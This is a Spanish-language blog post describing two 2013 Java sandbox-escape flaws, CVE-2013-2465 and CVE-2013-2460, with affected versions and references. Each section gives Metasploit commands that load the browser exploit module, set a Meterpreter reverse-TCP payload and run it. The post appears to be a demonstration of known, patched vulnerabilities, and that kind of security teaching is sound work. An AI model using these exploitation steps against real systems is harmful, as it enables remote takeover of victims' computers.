Nuevamente han salido a la luz 2 vulnerabilidades, la primera CVE-2013-2465 Java storeImageArray Vulnerability que afecta a Java versiones 7 update 21 y anteriores, Java versiones 6 update 45 y anteriores. La segunda CVE-2013-2460 Java Applet ProviderSkeleton Vulnerability afecta a Java versiones 7 Update 21 y anteriores.
Java storeImageArray Vulnerability
Este módulo abusa de una Vulnerabilidad de Indexado de un Arreglo Inválido en la función estática storeImageArray() que causa una corrupción en memoria saltándose el Sandbox de Java. La vulnerabilidad afecta a Java versiones 7 update 21 y anteriores, Java versiones 6 update 45 y anteriores. El bug es vigente tanto en sistemas que corren Windows como Linux.
Referencias:
- CVE-2013-2465
- OSVDB-96269
- Packet Storm Exploit 2013-0811-1
- Oracle Java SE Critical Patch Update Advisory – June 2013
Video con la explotación de CVE-2013-2465 Java storeImageArray Vulnerability con Metasploit:
use exploit/multi/browser/java_storeimagearray
set RHOST 192.168.0.20
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.20
exploit
sysinfo
getuidJava Applet ProviderSkeleton Vulnerability
Este módulo abusa del método inseguro invoke() de la clase ProviderSkeletonque permite llamar arbitrariamente métodos estáticos con los argumentos proporcionados por el usuario. La vulnerabilidad afecta a Java versiones 7 Update 21 y anteriores.
Referencias:
- CVE-2013-2460
- OSVDB-94346
- SE-2012-01-ORACLE-12
- Oracle Java SE Critical Patch Update Advisory – June 2013
Video con la explotación de CVE-2013-2460 Java Applet ProviderSkeleton Vulnerability con Metasploit:
use exploit/multi/browser/java_jre17_provider_skeleton
set RHOST 192.168.0.20
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.20
exploit
sysinfo
getuidFuente:
Ingeniero, me gusta la cyberseguridad, la programación y el blockchain.
0 Notaciones:
Publicar un comentario